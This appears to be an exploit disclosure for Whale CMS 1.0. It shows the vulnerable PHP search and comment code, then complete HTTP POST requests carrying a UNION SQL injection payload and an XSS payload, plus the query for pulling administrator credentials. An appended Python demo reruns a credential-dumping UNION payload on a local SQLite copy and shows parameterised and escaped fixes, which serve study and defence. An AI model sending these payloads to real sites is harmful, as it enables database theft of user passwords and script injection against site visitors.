
23.03.2015, 17:45
CMS: Whale CMS 1.0
Site: https://www.whale-cms.de
Admin panel: /backend/
Administrator login/password: SELECT name, passwort from [PREFIX]_users;
SQL Injection and Reflected XSS:
Requirements: MQ (magic_quotes_gpc) = OFF
/sys/template/include/suchen.php
PHP code:
...
$newssuche = $_POST['newssuche'];   // untrusted POST value, no escaping at all
// reflected XSS: the raw search term is echoed straight into the page
echo "Du hast nach dem Beitragtitel: \"$newssuche\" gesucht. Dadurch wurden folgende Einträge gefunden:
";
// SQL injection: the same value is concatenated into the LIKE literal
$newssuche_abfrage = mysql_query("SELECT * FROM ".$prefix."news WHERE titel LIKE '%".$newssuche."%' ORDER BY id DESC LIMIT 5");
$newssuche_ergebnis = mysql_query($newssuche_abfrage) or die(mysql_error());
...
Exploit:
Code:
POST /?page=Home&action=suchen HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 85
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=Home
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14
newssuche=' union select 1,2,3,4,version(),6,7,8,9,10,11--
Stored XSS and Error-Based SQL Injection:
/sys/template/include/newscontent.php
PHP code:
if($_GET['action'] == "neueskommentarposten")
{
    $newskommitext = $_POST['kommentartext'];     // untrusted POST value
    $newskommiautor = $_POST['kommentarautor'];   // untrusted, stored and later echoed unescaped (stored XSS)
    ...
    // SQL injection: both values are concatenated into the INSERT
    $qu8 = mysql_query("INSERT INTO ".$prefix."newskommentar (text, autor, datum, newsID) VALUES ('".$newskommitext."','".$newskommiautor."', '".$newskommidatum."', '".$newskomminewsID."')");
    if($qu8 == true)
    {
        ...
    }
    else
    {
        echo mysql_error();   // the raw MySQL error is shown to the user: error-based injection
    }
}
Exploit:
Code:
POST /?page=News&id=35&action=neueskommentarposten HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 65
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: localhost
User-Agent: '
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/?page=News&id=35
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=nk29sp2qp46mudr0594bksmb14
kommentarautor=">alert(/XSS/)&kommentartext=test
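The two patterns from the post (the concatenated LIKE query in suchen.php and the unescaped comment author from newscontent.php), as an added example that is not part of the original post and not Whale CMS code. It rebuilds both on an in-memory SQLite database so the injection can be run offline: the table prefix value `whale_`, the 11-column layout of the news table and all rows are constructed for the demo, and because `version()` is MySQL-only, the UNION payload instead selects the `name` and `passwort` columns the post names for the administrator credentials.

```python
import html
import sqlite3

# Added example, not code from Whale CMS or from the post. It rebuilds the two vulnerable
# patterns described above on an in-memory SQLite database so they can be run offline.
# The table prefix, the column layout and every row below are constructed for the demo.
PREFIX = "whale_"  # assumed value for the [PREFIX]_ placeholder used in the post


def build_db() -> sqlite3.Connection:
    """Throw-away schema shaped like [PREFIX]_news (11 columns, matching the post's
    11-value UNION) and [PREFIX]_users (name, passwort)."""
    con = sqlite3.connect(":memory:")
    news_cols = ", ".join(["id INTEGER PRIMARY KEY", "titel TEXT"] + [f"c{i} TEXT" for i in range(3, 12)])
    con.execute(f"CREATE TABLE {PREFIX}news ({news_cols})")
    con.execute(f"CREATE TABLE {PREFIX}users (id INTEGER PRIMARY KEY, name TEXT, passwort TEXT)")
    placeholders = ", ".join(["?"] * 11)
    con.executemany(
        f"INSERT INTO {PREFIX}news VALUES ({placeholders})",
        [(1, "Release notes", *["-"] * 9), (2, "Maintenance window", *["-"] * 9)],
    )
    con.executemany(
        f"INSERT INTO {PREFIX}users (name, passwort) VALUES (?, ?)",
        [("admin", "admin-hash"), ("editor", "editor-hash")],  # constructed sample rows
    )
    con.commit()
    return con


def search_vulnerable(con: sqlite3.Connection, newssuche: str) -> list:
    """The suchen.php pattern: the POSTed search term is concatenated into the SQL text,
    so a single quote ends the LIKE literal and the rest of the input becomes SQL."""
    sql = ("SELECT * FROM " + PREFIX + "news WHERE titel LIKE '%" + newssuche
           + "%' ORDER BY id DESC LIMIT 5")
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, newssuche: str) -> list:
    """Same query with a bound parameter: the term is data and can never become SQL.
    (% and _ inside the term still act as LIKE wildcards; add an ESCAPE clause if that matters.)"""
    sql = "SELECT * FROM " + PREFIX + "news WHERE titel LIKE ? ORDER BY id DESC LIMIT 5"
    return con.execute(sql, ("%" + newssuche + "%",)).fetchall()


# Same shape as the post's payload (11 columns, trailing comment), but instead of version()
# it selects the two columns the post names for the admin credentials. The space after "--"
# is needed on MySQL, where "--" only starts a comment when followed by whitespace.
PAYLOAD = "' UNION SELECT 1,2,3,4,name,6,7,8,9,10,passwort FROM " + PREFIX + "users-- "


def leaked_credentials(con: sqlite3.Connection) -> set:
    """Send the payload through the vulnerable search and collect (name, passwort) pairs.
    Rows from the UNIONed SELECT carry the literals 1 and 2 in their first two columns,
    which distinguishes them from genuine news rows."""
    rows = search_vulnerable(con, PAYLOAD)
    return {(r[4], r[10]) for r in rows if r[0] == 1 and r[1] == 2}


def render_author_field(autor: str, escape: bool) -> str:
    """The newscontent.php pattern: the stored comment author is echoed back into HTML.
    The post's payload starts with "> to break out of a quoted attribute; html.escape
    (the counterpart of PHP's htmlspecialchars with ENT_QUOTES) keeps it inside the attribute."""
    value = html.escape(autor, quote=True) if escape else autor
    return f'<input name="kommentarautor" value="{value}">'


if __name__ == "__main__":
    db = build_db()
    print("leaked via UNION:", sorted(leaked_credentials(db)))          # admin and editor rows
    print("same payload, bound parameter:", search_safe(db, PAYLOAD))   # []
    print(render_author_field('">alert(/XSS/)', escape=False))
    print(render_author_field('">alert(/XSS/)', escape=True))
```

The parameterised `search_safe` and the escaped `render_author_field` are the two fixes the post's findings call for: bind every user value instead of concatenating it, and encode for the HTML context (here an attribute) before echoing. Note that `mysql_error()` output must also stop reaching the user, otherwise the INSERT stays usable as an error-based oracle even after escaping.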